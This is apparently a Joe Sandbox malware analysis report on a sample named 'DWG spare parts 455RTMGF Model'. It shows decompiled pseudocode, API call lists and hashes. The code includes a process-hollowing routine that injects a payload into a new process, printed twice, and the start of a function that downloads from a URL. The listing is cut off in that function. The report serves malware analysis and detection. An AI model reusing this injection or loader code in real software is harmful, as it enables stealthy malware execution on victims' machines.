								_t74 =  &_v289;
								if(_t99 != _t74) {
									_t100 =  &(_t99[1]);
									if(_v22 != 0) {
										lstrcpynA(_t100,  &_v22, 0x105 - _t100 - _t74);
										_t112 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t112 == 0 && _v17 != 0) {
										lstrcpynA(_t100,  &_v17, 0x105 - _t100 -  &_v289);
										_t112 = LoadLibraryExA( &_v289, 0, 2);
										if(_t112 == 0) {
											_v15 = 0;
											lstrcpynA(_t100,  &_v17, 0x105 - _t100 -  &_v289);
											_t112 = LoadLibraryExA( &_v289, 0, 2);
										}
									}
								}
							}
							return _t112;
						} else {
							goto L3;
						}
					}
				}
			}






















                                                                0x02515d0d
                                                                0x02515d0f
                                                                0x02515d17
                                                                0x02515d28
                                                                0x02515d2d
                                                                0x02515d46
                                                                0x02515d4d
                                                                0x02515d8f
                                                                0x02515d91
                                                                0x02515d92
                                                                0x02515d97
                                                                0x02515d9a
                                                                0x02515d9d
                                                                0x02515daf
                                                                0x02515dd2
                                                                0x02515df2
                                                                0x02515df2
                                                                0x02515df6
                                                                0x02515dfc
                                                                0x02515dff
                                                                0x02515e02
                                                                0x02515e10
                                                                0x02515d4f
                                                                0x02515d64
                                                                0x02515d6b
                                                                0x00000000
                                                                0x02515d6d
                                                                0x02515d82
                                                                0x02515d89
                                                                0x02515e28
                                                                0x02515e3b
                                                                0x02515e40
                                                                0x02515e49
                                                                0x02515e73
                                                                0x02515e78
                                                                0x02515e77
                                                                0x02515e77
                                                                0x02515e87
                                                                0x02515e8f
                                                                0x02515e95
                                                                0x02515e9a
                                                                0x02515ead
                                                                0x02515ec2
                                                                0x02515ec2
                                                                0x02515ec6
                                                                0x02515ee5
                                                                0x02515efa
                                                                0x02515efe
                                                                0x02515f00
                                                                0x02515f1b
                                                                0x02515f30
                                                                0x02515f30
                                                                0x02515efe
                                                                0x02515ec6
                                                                0x02515e8f
                                                                0x02515f39
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x02515d89
                                                                0x02515d6b

                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02510000,0252D7B4), ref: 02515D28
                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02510000,0252D7B4), ref: 02515D46
                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02510000,0252D7B4), ref: 02515D64
                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02515D82
                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02515E11,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02515DCB
                                                                • RegQueryValueExA.ADVAPI32(?,02515F78,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02515E11,?,80000001), ref: 02515DE9
                                                                • RegCloseKey.ADVAPI32(?,02515E18,00000000,?,?,00000000,02515E11,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02515E0B
                                                                • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02515E28
                                                                • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02515E35
                                                                • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02515E3B
                                                                • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02515E66
                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02515EAD
                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02515EBD
                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02515EE5
                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02515EF5
                                                                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02515F1B
                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02515F2B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                • API String ID: 1759228003-2375825460
                                                                • Opcode ID: e4aba3bb1d798387e95711624bdd10384d79968a9da619d29ac83676ace3d193
                                                                • Instruction ID: bbca589ab1ecfe6cdc41080b0d5028346d19343eee778c87e9594d0691ecda66
                                                                • Opcode Fuzzy Hash: e4aba3bb1d798387e95711624bdd10384d79968a9da619d29ac83676ace3d193
                                                                • Instruction Fuzzy Hash: D2519571E4020D7AFB25D6A4CC85FEF7BADAB84740F8041E1AB04E6181E7B4DA44CF68
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 025248A4 Relevance: 15.2, APIs: 10, Instructions: 188memorythreadinjectionCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                C-Code - Quality: 83%
                                                                			E025248A4(char __eax, void* __ebx, intOrPtr __edx, void* __esi, void* __fp0) {
				char _v8;
				short* _t23;
				intOrPtr _t28;
				intOrPtr* _t31;
				int _t38;
				void* _t39;
				int _t40;
				intOrPtr _t41;
				void* _t43;
				intOrPtr _t45;
				intOrPtr _t47;
				intOrPtr _t49;
				void* _t51;
				void* _t55;
				intOrPtr _t56;
				void* _t58;
				void* _t59;
				intOrPtr _t61;
				void* _t64;
				void* _t66;
				intOrPtr _t72;
				intOrPtr _t74;
				intOrPtr _t76;
				intOrPtr _t80;
				void* _t82;
				long _t83;
				intOrPtr _t84;
				void* _t86;
				intOrPtr _t88;
				intOrPtr _t90;
				void* _t92;
				void* _t93;
				intOrPtr _t95;
				void* _t96;
				intOrPtr _t104;
				intOrPtr _t108;
				void* _t111;
				intOrPtr _t113;
				intOrPtr* _t119;
				intOrPtr* _t120;
				void* _t126;
				void* _t133;

				_t133 = __fp0;
				_t95 = __edx;
				_v8 = __eax;
				E02514D54(_v8);
				_push(_t119);
				_push(0x2524b2f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t119;
				 *0x256d46c = _t95;
				_t23 =  *0x256d46c; // 0x7ef90018
				if( *_t23 == 0x5a4d) {
					_push(0);
					_push(_t95);
					_t28 =  *0x256d46c; // 0x7ef90018
					_t3 = _t28 + 0x3c; // 0x110
					asm("cdq");
					asm("adc edx, [esp+0x4]");
					_t120 = _t119 + 8;
					 *0x256d470 =  *_t3 +  *_t119;
					_t31 =  *0x256d470; // 0x7ef90128
					if( *_t31 == 0x4550) {
						E02513518(0x256d35c, 0x44);
						E02513518(0x256d34c, 0x10);
						0x256d35c->cb = 0x44;
						_t38 = CreateProcessA(E02514D64(_v8), 0, 0, 0, 0, 0x44, 0, 0, 0x256d35c, 0x256d34c); // executed
						if(_t38 != 0) {
							0x256d3a0->ContextFlags = 0x10007;
							_t39 =  *0x256d350; // 0x5b4
							_t40 = GetThreadContext(_t39, 0x256d3a0); // executed
							if(_t40 != 0) {
								_t41 =  *0x256d444; // 0x3a2000
								_t43 = 0x256d34c->hProcess; // 0x5c8
								ReadProcessMemory(_t43, _t41 + 8, 0x256d474, 4, 0x256d47c);
								_t45 =  *0x256d470; // 0x7ef90128
								_t5 = _t45 + 0x34; // 0x400000
								_t126 =  *_t5 -  *0x256d474; // 0x400000
								if(_t126 != 0) {
									_t47 =  *0x256d470; // 0x7ef90128
									_t10 = _t47 + 0x50; // 0x7f000
									_t49 =  *0x256d470; // 0x7ef90128
									_t11 = _t49 + 0x34; // 0x400000
									_t51 = 0x256d34c->hProcess; // 0x5c8
									 *0x256d478 = VirtualAllocEx(_t51,  *_t11,  *_t10, 0x3000, 0x40);
								} else {
									_t80 =  *0x256d470; // 0x7ef90128
									_t6 = _t80 + 0x34; // 0x400000
									_t82 = 0x256d34c->hProcess; // 0x5c8
									_t83 = NtUnmapViewOfSection(_t82,  *_t6); // executed
									if(_t83 != 0) {
										_t84 =  *0x256d470; // 0x7ef90128
										_t9 = _t84 + 0x50; // 0x7f000
										_t86 = 0x256d34c->hProcess; // 0x5c8
										 *0x256d478 = VirtualAllocEx(_t86, 0,  *_t9, 0x3000, 0x40);
									} else {
										_t88 =  *0x256d470; // 0x7ef90128
										_t7 = _t88 + 0x50; // 0x7f000
										_t90 =  *0x256d470; // 0x7ef90128
										_t8 = _t90 + 0x34; // 0x400000
										_t92 = 0x256d34c->hProcess; // 0x5c8
										_t93 = VirtualAllocEx(_t92,  *_t8,  *_t7, 0x3000, 0x40); // executed
										 *0x256d478 = _t93;
									}
								}
								if( *0x256d478 != 0) {
									_t96 = E025247B4(_t95, _t133);
									_t108 =  *0x256d470; // 0x7ef90128
									_t12 = _t108 + 0x34; // 0x400000
									_t109 =  *_t12;
									_t55 =  *0x256d478; // 0x400000
									if( *_t12 != _t55) {
										_t72 =  *0x256d470; // 0x7ef90128
										E025246AC(_t133, _t96, _t72, _t55 - _t109);
										_t74 =  *0x256d470; // 0x7ef90128
										_t111 =  *0x256d478; // 0x400000
										 *(_t74 + 0x34) = _t111;
										_push(0);
										_push(_t96);
										_t76 =  *0x256d46c; // 0x7ef90018
										_t14 = _t76 + 0x3c; // 0x110
										asm("cdq");
										asm("adc edx, [esp+0x4]");
										_t113 =  *0x256d470; // 0x7ef90128
										E02516A58( *_t14 +  *_t120, _t113);
									}
									_t56 =  *0x256d470; // 0x7ef90128
									_t15 = _t56 + 0x50; // 0x7f000
									_t58 =  *0x256d478; // 0x400000
									_t59 = 0x256d34c->hProcess; // 0x5c8
									WriteProcessMemory(_t59, _t58, _t96,  *_t15, 0x256d47c);
									_t61 =  *0x256d470; // 0x7ef90128
									_t16 = _t61 + 0x28; // 0x327a4
									 *0x256d450 =  *_t16 +  *0x256d478;
									_t64 =  *0x256d350; // 0x5b4
									SetThreadContext(_t64, 0x256d3a0);
									_t66 =  *0x256d350; // 0x5b4
									ResumeThread(_t66);
									E02512C5C(_t96);
								}
							}
						}
					}
				}
				_pop(_t104);
				 *[fs:eax] = _t104;
				_push(E02524B36);
				return E025148A0( &_v8);
			}













































                                                                0x025248a4
                                                                0x025248aa
                                                                0x025248ac
                                                                0x025248b2
                                                                0x025248b9
                                                                0x025248ba
                                                                0x025248bf
                                                                0x025248c2
                                                                0x025248c7
                                                                0x025248cd
                                                                0x025248d7
                                                                0x025248e1
                                                                0x025248e2
                                                                0x025248e3
                                                                0x025248e8
                                                                0x025248eb
                                                                0x025248ef
                                                                0x025248f3
                                                                0x025248f6
                                                                0x025248fb
                                                                0x02524906
                                                                0x02524918
                                                                0x02524929
                                                                0x0252492e
                                                                0x02524959
                                                                0x02524960
                                                                0x02524966
                                                                0x02524975
                                                                0x0252497b
                                                                0x02524982
                                                                0x02524994
                                                                0x0252499d
                                                                0x025249a3
                                                                0x025249a8
                                                                0x025249ad
                                                                0x025249b0
                                                                0x025249b6
                                                                0x02524a26
                                                                0x02524a2b
                                                                0x02524a2f
                                                                0x02524a34
                                                                0x02524a38
                                                                0x02524a43
                                                                0x025249b8
                                                                0x025249b8
                                                                0x025249bd
                                                                0x025249c1
                                                                0x025249c7
                                                                0x025249ce
                                                                0x02524a02
                                                                0x02524a07
                                                                0x02524a0d
                                                                0x02524a18
                                                                0x025249d0
                                                                0x025249d7
                                                                0x025249dc
                                                                0x025249e0
                                                                0x025249e5
                                                                0x025249e9
                                                                0x025249ef
                                                                0x025249f4
                                                                0x025249f4
                                                                0x025249ce
                                                                0x02524a4f
                                                                0x02524a5c
                                                                0x02524a5e
                                                                0x02524a64
                                                                0x02524a64
                                                                0x02524a67
                                                                0x02524a6e
                                                                0x02524a73
                                                                0x02524a7a
                                                                0x02524a7f
                                                                0x02524a84
                                                                0x02524a8a
                                                                0x02524a91
                                                                0x02524a92
                                                                0x02524a93
                                                                0x02524a98
                                                                0x02524a9b
                                                                0x02524a9f
                                                                0x02524aab
                                                                0x02524ab1
                                                                0x02524ab1
                                                                0x02524abb
                                                                0x02524ac0
                                                                0x02524ac5
                                                                0x02524acb
                                                                0x02524ad1
                                                                0x02524ad6
                                                                0x02524adb
                                                                0x02524ae4
                                                                0x02524aee
                                                                0x02524af4
                                                                0x02524af9
                                                                0x02524aff
                                                                0x02524b0e
                                                                0x02524b13
                                                                0x02524a4f
                                                                0x02524982
                                                                0x02524960
                                                                0x02524906
                                                                0x02524b1b
                                                                0x02524b1e
                                                                0x02524b21
                                                                0x02524b2e

                                                                APIs
                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,0256D35C,0256D34C), ref: 02524959
                                                                • GetThreadContext.KERNEL32(000005B4,0256D3A0,00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,0256D35C,0256D34C), ref: 0252497B
                                                                • ReadProcessMemory.KERNEL32(000005C8,003A1FF8,0256D474,00000004,0256D47C,000005B4,0256D3A0,00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,0256D35C), ref: 025249A3
                                                                • NtUnmapViewOfSection.N(000005C8,00400000,000005C8,003A1FF8,0256D474,00000004,0256D47C,000005B4,0256D3A0,00000000,00000000,00000000,00000000,00000000,00000044,00000000), ref: 025249C7
                                                                • VirtualAllocEx.KERNEL32(000005C8,00400000,0007F000,00003000,00000040,000005C8,00400000,000005C8,003A1FF8,0256D474,00000004,0256D47C,000005B4,0256D3A0,00000000,00000000), ref: 025249EF
                                                                • VirtualAllocEx.KERNEL32(000005C8,00000000,0007F000,00003000,00000040,000005C8,00400000,000005C8,003A1FF8,0256D474,00000004,0256D47C,000005B4,0256D3A0,00000000,00000000), ref: 02524A13
                                                                • VirtualAllocEx.KERNEL32(000005C8,00400000,0007F000,00003000,00000040,000005C8,003A1FF8,0256D474,00000004,0256D47C,000005B4,0256D3A0,00000000,00000000,00000000,00000000), ref: 02524A3E
                                                                • WriteProcessMemory.KERNEL32(000005C8,00400000,00000000,0007F000,0256D47C,000005C8,00400000,0007F000,00003000,00000040,000005C8,003A1FF8,0256D474,00000004,0256D47C,000005B4), ref: 02524AD1
                                                                • SetThreadContext.KERNEL32(000005B4,0256D3A0,000005C8,00400000,00000000,0007F000,0256D47C,000005C8,00400000,0007F000,00003000,00000040,000005C8,003A1FF8,0256D474,00000004), ref: 02524AF4
                                                                • ResumeThread.KERNEL32(000005B4,000005B4,0256D3A0,000005C8,00400000,00000000,0007F000,0256D47C,000005C8,00400000,0007F000,00003000,00000040,000005C8,003A1FF8,0256D474), ref: 02524AFF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocProcessThreadVirtual$ContextMemory$CreateReadResumeSectionUnmapViewWrite
                                                                • String ID:
                                                                • API String ID: 995461784-0
                                                                • Opcode ID: 108f74eac4ae7baf131746c3d0d1a13384cfe510d8e2b80e88a24e5bfbf88c1e
                                                                • Instruction ID: 72ded70c9ca07bd09d8165c6d87996a53af7608cc590e82e82926b959edfdce3
                                                                • Opcode Fuzzy Hash: 108f74eac4ae7baf131746c3d0d1a13384cfe510d8e2b80e88a24e5bfbf88c1e
                                                                • Instruction Fuzzy Hash: 686104B0B92200AFE748DE6DD889F2A37B9B789705F054D14F644DB680C7B5EC289B1C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 025248A2 Relevance: 12.2, APIs: 8, Instructions: 166memorythreadinjectionCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                C-Code - Quality: 83%
                                                                			E025248A2(char __eax, void* __ebx, intOrPtr __edx, void* __esi, void* __fp0) {
				char _v8;
				short* _t23;
				intOrPtr _t28;
				intOrPtr* _t31;
				int _t38;
				void* _t39;
				int _t40;
				intOrPtr _t41;
				void* _t43;
				intOrPtr _t45;
				intOrPtr _t47;
				intOrPtr _t49;
				void* _t51;
				void* _t55;
				intOrPtr _t56;
				void* _t58;
				void* _t59;
				intOrPtr _t61;
				void* _t64;
				void* _t66;
				intOrPtr _t72;
				intOrPtr _t74;
				intOrPtr _t76;
				intOrPtr _t80;
				void* _t82;
				long _t83;
				intOrPtr _t84;
				void* _t86;
				intOrPtr _t88;
				intOrPtr _t90;
				void* _t92;
				void* _t93;
				intOrPtr _t95;
				void* _t96;
				intOrPtr _t104;
				intOrPtr _t108;
				void* _t111;
				intOrPtr _t113;
				intOrPtr* _t119;
				intOrPtr* _t120;
				void* _t126;
				void* _t133;

				_t133 = __fp0;
				_t95 = __edx;
				_v8 = __eax;
				E02514D54(_v8);
				_push(_t119);
				_push(0x2524b2f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t119;
				 *0x256d46c = _t95;
				_t23 =  *0x256d46c; // 0x7ef90018
				if( *_t23 == 0x5a4d) {
					_push(0);
					_push(_t95);
					_t28 =  *0x256d46c; // 0x7ef90018
					_t3 = _t28 + 0x3c; // 0x110
					asm("cdq");
					asm("adc edx, [esp+0x4]");
					_t120 = _t119 + 8;
					 *0x256d470 =  *_t3 +  *_t119;
					_t31 =  *0x256d470; // 0x7ef90128
					if( *_t31 == 0x4550) {
						E02513518(0x256d35c, 0x44);
						E02513518(0x256d34c, 0x10);
						0x256d35c->cb = 0x44;
						_t38 = CreateProcessA(E02514D64(_v8), 0, 0, 0, 0, 0x44, 0, 0, 0x256d35c, 0x256d34c); // executed
						if(_t38 != 0) {
							0x256d3a0->ContextFlags = 0x10007;
							_t39 =  *0x256d350; // 0x5b4
							_t40 = GetThreadContext(_t39, 0x256d3a0); // executed
							if(_t40 != 0) {
								_t41 =  *0x256d444; // 0x3a2000
								_t43 = 0x256d34c->hProcess; // 0x5c8
								ReadProcessMemory(_t43, _t41 + 8, 0x256d474, 4, 0x256d47c);
								_t45 =  *0x256d470; // 0x7ef90128
								_t5 = _t45 + 0x34; // 0x400000
								_t126 =  *_t5 -  *0x256d474; // 0x400000
								if(_t126 != 0) {
									_t47 =  *0x256d470; // 0x7ef90128
									_t10 = _t47 + 0x50; // 0x7f000
									_t49 =  *0x256d470; // 0x7ef90128
									_t11 = _t49 + 0x34; // 0x400000
									_t51 = 0x256d34c->hProcess; // 0x5c8
									 *0x256d478 = VirtualAllocEx(_t51,  *_t11,  *_t10, 0x3000, 0x40);
								} else {
									_t80 =  *0x256d470; // 0x7ef90128
									_t6 = _t80 + 0x34; // 0x400000
									_t82 = 0x256d34c->hProcess; // 0x5c8
									_t83 = NtUnmapViewOfSection(_t82,  *_t6); // executed
									if(_t83 != 0) {
										_t84 =  *0x256d470; // 0x7ef90128
										_t9 = _t84 + 0x50; // 0x7f000
										_t86 = 0x256d34c->hProcess; // 0x5c8
										 *0x256d478 = VirtualAllocEx(_t86, 0,  *_t9, 0x3000, 0x40);
									} else {
										_t88 =  *0x256d470; // 0x7ef90128
										_t7 = _t88 + 0x50; // 0x7f000
										_t90 =  *0x256d470; // 0x7ef90128
										_t8 = _t90 + 0x34; // 0x400000
										_t92 = 0x256d34c->hProcess; // 0x5c8
										_t93 = VirtualAllocEx(_t92,  *_t8,  *_t7, 0x3000, 0x40); // executed
										 *0x256d478 = _t93;
									}
								}
								if( *0x256d478 != 0) {
									_t96 = E025247B4(_t95, _t133);
									_t108 =  *0x256d470; // 0x7ef90128
									_t12 = _t108 + 0x34; // 0x400000
									_t109 =  *_t12;
									_t55 =  *0x256d478; // 0x400000
									if( *_t12 != _t55) {
										_t72 =  *0x256d470; // 0x7ef90128
										E025246AC(_t133, _t96, _t72, _t55 - _t109);
										_t74 =  *0x256d470; // 0x7ef90128
										_t111 =  *0x256d478; // 0x400000
										 *(_t74 + 0x34) = _t111;
										_push(0);
										_push(_t96);
										_t76 =  *0x256d46c; // 0x7ef90018
										_t14 = _t76 + 0x3c; // 0x110
										asm("cdq");
										asm("adc edx, [esp+0x4]");
										_t113 =  *0x256d470; // 0x7ef90128
										E02516A58( *_t14 +  *_t120, _t113);
									}
									_t56 =  *0x256d470; // 0x7ef90128
									_t15 = _t56 + 0x50; // 0x7f000
									_t58 =  *0x256d478; // 0x400000
									_t59 = 0x256d34c->hProcess; // 0x5c8
									WriteProcessMemory(_t59, _t58, _t96,  *_t15, 0x256d47c);
									_t61 =  *0x256d470; // 0x7ef90128
									_t16 = _t61 + 0x28; // 0x327a4
									 *0x256d450 =  *_t16 +  *0x256d478;
									_t64 =  *0x256d350; // 0x5b4
									SetThreadContext(_t64, 0x256d3a0);
									_t66 =  *0x256d350; // 0x5b4
									ResumeThread(_t66);
									E02512C5C(_t96);
								}
							}
						}
					}
				}
				_pop(_t104);
				 *[fs:eax] = _t104;
				_push(E02524B36);
				return E025148A0( &_v8);
			}













































                                                                0x025248a2
                                                                0x025248aa
                                                                0x025248ac
                                                                0x025248b2
                                                                0x025248b9
                                                                0x025248ba
                                                                0x025248bf
                                                                0x025248c2
                                                                0x025248c7
                                                                0x025248cd
                                                                0x025248d7
                                                                0x025248e1
                                                                0x025248e2
                                                                0x025248e3
                                                                0x025248e8
                                                                0x025248eb
                                                                0x025248ef
                                                                0x025248f3
                                                                0x025248f6
                                                                0x025248fb
                                                                0x02524906
                                                                0x02524918
                                                                0x02524929
                                                                0x0252492e
                                                                0x02524959
                                                                0x02524960
                                                                0x02524966
                                                                0x02524975
                                                                0x0252497b
                                                                0x02524982
                                                                0x02524994
                                                                0x0252499d
                                                                0x025249a3
                                                                0x025249a8
                                                                0x025249ad
                                                                0x025249b0
                                                                0x025249b6
                                                                0x02524a26
                                                                0x02524a2b
                                                                0x02524a2f
                                                                0x02524a34
                                                                0x02524a38
                                                                0x02524a43
                                                                0x025249b8
                                                                0x025249b8
                                                                0x025249bd
                                                                0x025249c1
                                                                0x025249c7
                                                                0x025249ce
                                                                0x02524a02
                                                                0x02524a07
                                                                0x02524a0d
                                                                0x02524a18
                                                                0x025249d0
                                                                0x025249d7
                                                                0x025249dc
                                                                0x025249e0
                                                                0x025249e5
                                                                0x025249e9
                                                                0x025249ef
                                                                0x025249f4
                                                                0x025249f4
                                                                0x025249ce
                                                                0x02524a4f
                                                                0x02524a5c
                                                                0x02524a5e
                                                                0x02524a64
                                                                0x02524a64
                                                                0x02524a67
                                                                0x02524a6e
                                                                0x02524a73
                                                                0x02524a7a
                                                                0x02524a7f
                                                                0x02524a84
                                                                0x02524a8a
                                                                0x02524a91
                                                                0x02524a92
                                                                0x02524a93
                                                                0x02524a98
                                                                0x02524a9b
                                                                0x02524a9f
                                                                0x02524aab
                                                                0x02524ab1
                                                                0x02524ab1
                                                                0x02524abb
                                                                0x02524ac0
                                                                0x02524ac5
                                                                0x02524acb
                                                                0x02524ad1
                                                                0x02524ad6
                                                                0x02524adb
                                                                0x02524ae4
                                                                0x02524aee
                                                                0x02524af4
                                                                0x02524af9
                                                                0x02524aff
                                                                0x02524b0e
                                                                0x02524b13
                                                                0x02524a4f
                                                                0x02524982
                                                                0x02524960
                                                                0x02524906
                                                                0x02524b1b
                                                                0x02524b1e
                                                                0x02524b21
                                                                0x02524b2e

                                                                APIs
                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,0256D35C,0256D34C), ref: 02524959
                                                                • GetThreadContext.KERNEL32(000005B4,0256D3A0,00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,0256D35C,0256D34C), ref: 0252497B
                                                                • ReadProcessMemory.KERNEL32(000005C8,003A1FF8,0256D474,00000004,0256D47C,000005B4,0256D3A0,00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,0256D35C), ref: 025249A3
                                                                • NtUnmapViewOfSection.N(000005C8,00400000,000005C8,003A1FF8,0256D474,00000004,0256D47C,000005B4,0256D3A0,00000000,00000000,00000000,00000000,00000000,00000044,00000000), ref: 025249C7
                                                                • VirtualAllocEx.KERNEL32(000005C8,00400000,0007F000,00003000,00000040,000005C8,00400000,000005C8,003A1FF8,0256D474,00000004,0256D47C,000005B4,0256D3A0,00000000,00000000), ref: 025249EF
                                                                • VirtualAllocEx.KERNEL32(000005C8,00000000,0007F000,00003000,00000040,000005C8,00400000,000005C8,003A1FF8,0256D474,00000004,0256D47C,000005B4,0256D3A0,00000000,00000000), ref: 02524A13
                                                                • VirtualAllocEx.KERNEL32(000005C8,00400000,0007F000,00003000,00000040,000005C8,003A1FF8,0256D474,00000004,0256D47C,000005B4,0256D3A0,00000000,00000000,00000000,00000000), ref: 02524A3E
                                                                • WriteProcessMemory.KERNEL32(000005C8,00400000,00000000,0007F000,0256D47C,000005C8,00400000,0007F000,00003000,00000040,000005C8,003A1FF8,0256D474,00000004,0256D47C,000005B4), ref: 02524AD1
                                                                • SetThreadContext.KERNEL32(000005B4,0256D3A0,000005C8,00400000,00000000,0007F000,0256D47C,000005C8,00400000,0007F000,00003000,00000040,000005C8,003A1FF8,0256D474,00000004), ref: 02524AF4
                                                                • ResumeThread.KERNEL32(000005B4,000005B4,0256D3A0,000005C8,00400000,00000000,0007F000,0256D47C,000005C8,00400000,0007F000,00003000,00000040,000005C8,003A1FF8,0256D474), ref: 02524AFF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocProcessThreadVirtual$ContextMemory$CreateReadResumeSectionUnmapViewWrite
                                                                • String ID:
                                                                • API String ID: 995461784-0
                                                                • Opcode ID: d5b197189182a3d67caaaf1742a72bd754fae0c4b3734115903ebf6d920376f7
                                                                • Instruction ID: df7d2134fc4f91182f1023e49ed1a5ebbfd382369e86a4169b791f8ba4a45bc3
                                                                • Opcode Fuzzy Hash: d5b197189182a3d67caaaf1742a72bd754fae0c4b3734115903ebf6d920376f7
                                                                • Instruction Fuzzy Hash: 995114B0B92200AFE748DE6DD889E2A37B9BB89705F484D14F544D7680C7B4EC289B1C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 02525974 Relevance: 7.6, APIs: 5, Instructions: 97networkfileCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                C-Code - Quality: 59%
                                                                			E02525974(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __esi, void* __eflags) {
				char _v8;
				char* _t20;
				void* _t21;
				void* _t22;
				void* _t24;
				void* _t27;
				void* _t34;
				void* _t37;
				long _t43;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t51;
				intOrPtr _t52;
				void* _t54;
				intOrPtr _t56;
				intOrPtr _t57;

				_t56 = _t57;
				_push(0);
				_t37 = __edx;
				_t54 = __eax;
				_push(_t56);
				_push(0x2525ab2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t57;
				E025148A0(__edx);
				E0251304C(0x64);
				E02517C64( &_v8);
				 *0x256d4cc = InternetOpenA(E02514D64(_v8), 0, 0, 0, 0);
				if( *0x256d4cc == 0) {
					__eflags = 0;
					_pop(_t48);
					 *[fs:eax] = _t48;
					_push(E02525AB9);
					return E025148A0( &_v8);
				} else {
					_push(_t56);
					_push(0x2525a95);
					_push( *[fs:eax]);
					 *[fs:eax] = _t57;
					_t20 = E02514D64(_t54);
					_t21 =  *0x256d4cc; // 0xcc0004
					_t22 = InternetOpenUrlA(_t21, _t20, 0, 0, 0x4000000, 0); // executed
